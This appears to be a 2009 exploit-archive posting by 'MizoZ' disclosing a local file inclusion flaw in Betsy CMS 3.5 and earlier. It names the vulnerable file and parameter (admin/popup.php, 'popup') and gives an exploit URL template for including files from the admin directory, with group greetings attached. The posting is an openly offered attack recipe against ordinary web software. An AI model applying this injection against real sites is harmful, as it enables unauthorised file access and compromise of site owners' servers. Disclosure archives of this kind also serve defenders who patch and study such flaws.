[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Betsy CMS versions <= 3.5 Local File Inclusion Vulnerability
# Published : 2009-11-21
# Author : MizoZ
# Previous Title : PHP MultiPart Form-Data Denial of Service PoC
# Next Title : Vivid Ads Shopping Cart (prodid) Remote SQL Injection
/*
Author : MizoZ [from MA]
Group : EvilWay
Email : mizozx[at]gmail[dot]com
Greetz : Zuka !!
Good luck DZ :)
*/
The vulnerability is in the file admin/popup.php on the get $_GET['popup']
Exploit :
[HOST]/[PATH]/admin/popup.php?popup=[IT INCLUDE FROM admin/]